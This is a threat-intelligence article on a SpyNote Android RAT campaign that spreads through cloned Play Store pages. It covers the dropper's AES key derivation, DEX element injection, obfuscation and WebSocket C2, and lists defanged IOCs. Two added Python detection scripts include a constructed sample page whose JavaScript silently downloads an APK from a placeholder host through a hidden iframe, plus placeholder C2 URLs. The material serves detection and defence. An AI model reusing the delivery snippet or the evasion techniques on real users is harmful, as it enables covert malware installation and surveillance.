Cybersecurity researchers have uncovered a persistent campaign deploying the AndroidOS SpyNote malware, a sophisticated Remote Access Trojan (RAT) designed for surveillance, data exfiltration, and remote device control.
This operation mimics legitimate Google Play Store pages for popular Android apps, tricking users into downloading malicious APK files.
The campaign, linked to the same threat actor previously detailed in an April DomainTools Intelligence (DTI) report, demonstrates minor evolutions in tactics, including shifts in IP resolutions and enhanced anti-analysis measures within the APK dropper to shield the SpyNote payload from detection.
SpyNote Campaign Targets Android Users
SpyNote’s capabilities are extensive, encompassing remote access to device cameras and microphones, call management, command execution, keylogging for credential theft, and exploitation of Android Accessibility Services to intercept two-factor authentication (2FA) codes.
When granted device-administrator privileges, it can wipe data, lock the device, or install additional malware, which makes it a high-risk tool for both espionage and financially motivated cybercrime.
The deceptive websites are static HTML and CSS clones of authentic Play Store interfaces, hosted on domains registered via registrars like NameSilo, LLC, and XinNet Technology Corporation.
These sites resolve to IP addresses belonging to providers such as Lightnode Limited and Vultr Holdings LLC, run nginx, and present TLS certificates issued by the Let's Encrypt intermediates R10 and R11.
Nameservers from dnsowl[.]com and xincache[.]com are common, with prominent resolutions to addresses like 154.90.58[.]26 and 199.247.6[.]61.
Embedded scripts, including references to unpkg[.]com/[email protected] and obfuscated strings such as “sBw2N8uateIzRr93vmFze5MF_35vMk5F1wG04L5JcJE”, facilitate the download mechanism.
Upon clicking the fake “Install” button, a JavaScript function creates a hidden iframe to trigger the APK download without navigating away from the page.
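As an added example, not code from the campaign's pages or from the DomainTools report, the following Python scanner parses a page's inline scripts and iframe tags and reports APK URLs that would be delivered the way just described: either a script that creates an iframe at click time and points it at an APK, or an iframe hidden in the markup with an APK as its source. The sample page and the host store-clone.example are constructed for the demonstration.

```python
import re
from html.parser import HTMLParser

APK_URL = re.compile(r"""https?://[^\s'"<>]+\.apk\b""", re.IGNORECASE)
IFRAME_CREATE = re.compile(r"createElement\(\s*['\"]iframe['\"]\s*\)", re.IGNORECASE)
HIDDEN_CSS = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.IGNORECASE)


class _PageCollector(HTMLParser):
    """Gather inline <script> bodies and <iframe> attributes from one page."""

    def __init__(self):
        super().__init__()
        self.scripts, self.iframes, self._in_script = [], [], False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
        elif tag == "iframe":
            self.iframes.append(dict(attrs))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)


def find_iframe_apk_downloads(html):
    """APK URLs a page pushes through an iframe, built by script or hidden in markup."""
    page = _PageCollector()
    page.feed(html)
    hits = set()
    for js in page.scripts:
        # The trick needs both: an iframe created on the fly and an APK URL to load in it.
        if IFRAME_CREATE.search(js):
            hits.update(APK_URL.findall(js))
    for attrs in page.iframes:
        src = attrs.get("src") or ""
        hidden = "hidden" in attrs or HIDDEN_CSS.search(attrs.get("style") or "")
        if hidden and APK_URL.fullmatch(src):
            hits.add(src)
    return sorted(hits)


# Constructed page imitating the behaviour described above (placeholder host).
SAMPLE_PAGE = """<html><body>
<button onclick="install()">Install</button>
<script>
function install() {
  var f = document.createElement('iframe');
  f.style.display = 'none';
  f.src = 'https://store-clone.example/Chrome.apk';
  document.body.appendChild(f);  // download starts, the page never navigates
}
</script>
<iframe style="display:none" src="https://store-clone.example/Game.apk"></iframe>
</body></html>"""

if __name__ == "__main__":
    for url in find_iframe_apk_downloads(SAMPLE_PAGE):
        print("APK pushed via hidden iframe:", url)
```

The same function can be run over the saved HTML of any suspected clone page; anything it returns is worth checking against the APK URLs in the IOC table.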
Evolved Malware Delivery
The malware execution chain begins with an initial dropper APK, such as Chrome.apk (SHA-256: 48aa5f908fa612dcb38acf4005de72b9379f50c7e1bc43a4e64ce274bb7566e8), which decrypts an embedded encrypted payload with an AES key derived from the package name declared in the manifest; for the package "rogcysibz.wbnyvkrn.sstjjs" the derived key is "62646632363164386461323836333631", the hex encoding of the 16 ASCII bytes "bdf261d8da286361".

This dropper uses DEX element injection: through reflection it reaches the application ClassLoader's internal array of DEX elements at runtime and places its own element ahead of the legitimate ones, so classes from the injected DEX are resolved first. The payload therefore never appears in the APK's visible classes.dex, which defeats static analysis, and the injected classes can hijack app functions to intercept data.
It concatenates the asset files 000 and 001, decrypts the result and decompresses it into the core SpyNote APK (SHA-256: 86e8d3716318e9bb63b86aebe185db5db6718cb3ddea7fbafefa8ebfb674b9e8), which in turn dynamically loads a DEX file containing the command-and-control (C2) logic.
Recent samples add control-flow obfuscation and identifier obfuscation in which class and member names are spelled only with the look-alike characters 'o', 'O' and '0', making decompiled code hard to read and slowing reverse engineering.
The implant connects to its C2 over WebSocket, choosing a URL from a hardcoded list of domains, so the loss of any single domain does not cut the infected device off from the operator.
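As an added example that is not code from the DomainTools report or from the malware, the Python script below reads the string table of a DEX file (the dynamically loaded DEX mentioned above is where the C2 logic lives) and applies the two traits just described: hardcoded ws:// or wss:// endpoints, and identifiers spelled only with 'o', 'O' and '0'. The DEX bytes are constructed in the script from a small string list, and the hostnames in it are placeholders, not the campaign's C2 domains; the MUTF-8 handling covers only the encoded U+0000 case, which is sufficient for ASCII names and URLs.

```python
import re
import struct

# Minimal DEX string-table reader. Header fields used: string_ids_size at
# offset 0x38 and string_ids_off at 0x3C; each string_id_item is a uint32
# offset of a string_data_item (ULEB128 utf16 length, MUTF-8 bytes, NUL).


def _uleb128_decode(buf, off):
    """Return (value, offset_after_value) for the ULEB128 at buf[off]."""
    value, shift = 0, 0
    while True:
        b = buf[off]
        off += 1
        value |= (b & 0x7F) << shift
        if not b & 0x80:
            return value, off
        shift += 7


def _uleb128_encode(n):
    out = bytearray()
    while True:
        b, n = n & 0x7F, n >> 7
        out.append(b | 0x80 if n else b)
        if not n:
            return bytes(out)


def dex_strings(dex):
    """Every entry of the DEX string table, in index order."""
    if dex[:4] != b"dex\n":
        raise ValueError("not a DEX file")
    count, ids_off = struct.unpack_from("<II", dex, 0x38)
    out = []
    for i in range(count):
        (data_off,) = struct.unpack_from("<I", dex, ids_off + 4 * i)
        _, start = _uleb128_decode(dex, data_off)  # skip the utf16 length
        end = dex.index(b"\x00", start)  # MUTF-8 never contains a raw NUL byte
        raw = dex[start:end].replace(b"\xc0\x80", b"\x00")  # MUTF-8 NUL -> U+0000
        out.append(raw.decode("utf-8", "replace"))
    return out


# Heuristics for the two traits described in the text.
WS_URL = re.compile(r"wss?://[A-Za-z0-9.\-]+(?::\d+)?(?:/\S*)?")
OBF_NAME = re.compile(r"^[oO0]{3,}$")


def websocket_c2_candidates(strings):
    """Hardcoded ws:// or wss:// endpoints, i.e. the list the client picks a C2 from."""
    hits = set()
    for s in strings:
        hits.update(WS_URL.findall(s))
    return sorted(hits)


def obfuscated_identifiers(strings):
    """Type or member names spelled only with the look-alikes 'o', 'O' and '0'."""
    found = set()
    for s in strings:
        # Class descriptors look like Lpkg/Name; -- keep only the simple name.
        name = s[1:-1].rsplit("/", 1)[-1] if s.startswith("L") and s.endswith(";") else s
        if OBF_NAME.match(name):
            found.add(name)
    return sorted(found)


def build_dex(strings):
    """Constructed test input: a DEX carrying nothing but a string table."""
    ids_off = 0x70  # header_item is 0x70 bytes; string_ids follow it directly
    data_off = ids_off + 4 * len(strings)
    data, offsets = bytearray(), []
    for s in strings:
        offsets.append(data_off + len(data))
        body = s.encode("utf-8").replace(b"\x00", b"\xc0\x80")
        data += _uleb128_encode(len(s)) + body + b"\x00"
    header = bytearray(0x70)
    header[:8] = b"dex\n035\x00"
    struct.pack_into("<I", header, 0x20, data_off + len(data))  # file_size
    struct.pack_into("<I", header, 0x24, 0x70)  # header_size
    struct.pack_into("<I", header, 0x28, 0x12345678)  # endian_tag
    struct.pack_into("<II", header, 0x38, len(strings), ids_off)
    return bytes(header) + b"".join(struct.pack("<I", o) for o in offsets) + bytes(data)


# Constructed sample strings; the hosts are placeholders, not the campaign's C2s.
SAMPLE_STRINGS = [
    "Lcom/example/oO0O;",
    "OOo0o",
    "onCreate",
    "wss://c2-one.example/ws",
    "ws://c2-two.example:8080/socket",
    "retry connect to wss://c2-three.example",
    "a\x00b",
]


def triage(dex):
    strings = dex_strings(dex)
    return {"c2": websocket_c2_candidates(strings),
            "obfuscated": obfuscated_identifiers(strings)}


if __name__ == "__main__":
    print(triage(build_dex(SAMPLE_STRINGS)))
```

Against a real sample, `triage(open("classes.dex", "rb").read())` on the DEX that the unpacked SpyNote APK loads gives a first cut at the C2 list to compare with the IOC table; the string table only covers literals, so endpoints assembled at runtime will not show up here.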
The threat actor targets a broad range of spoofed apps, including social platforms like iHappy and CamSoda, games such as 8 Ball Pool, and utilities like Chrome, indicating opportunistic, financially motivated attacks on consumers.
Infrastructure remains limited to two primary IPs, rotated over time but never diversified, and the delivery code contains Chinese-language comments, though attribution remains unclear.
This campaign underscores the enduring threat of mobile RATs through social engineering, despite the actor’s modest technical sophistication.
Recommendations include bolstering browser warnings against fake sites, advancing antivirus detection for obfuscated APKs, and integrating VPN-level filtering for malicious C2 connections.
Indicators of Compromise (IOCs)
| Category | Examples |
|---|---|
| IPs | 154.90.58[.]26, 199.247.6[.]61 |
| Domains | mcspa[.]top, pyfcf[.]top, atdfp[.]top (and others listed in the report) |
| APK URLs | https[:]//bcgrt[.]top/Beauty[.]apk, https[:]//megha[.]top/iHappy[.]apk (and others) |
| Droppers (SHA-256) | 48aa5f908fa612dcb38acf4005de72b9379f50c7e1bc43a4e64ce274bb7566e8, db91da6b3e85d9c11255e50ef10e5636b1d5e5d9e417998daa22a58ae0b2c29f (and others) |
| SpyNote (SHA-256) | 86e8d3716318e9bb63b86aebe185db5db6718cb3ddea7fbafefa8ebfb674b9e8 (and variants) |
| C2 Domains | mskisdakw[.]top, fsdlaowaa[.]top (and others) |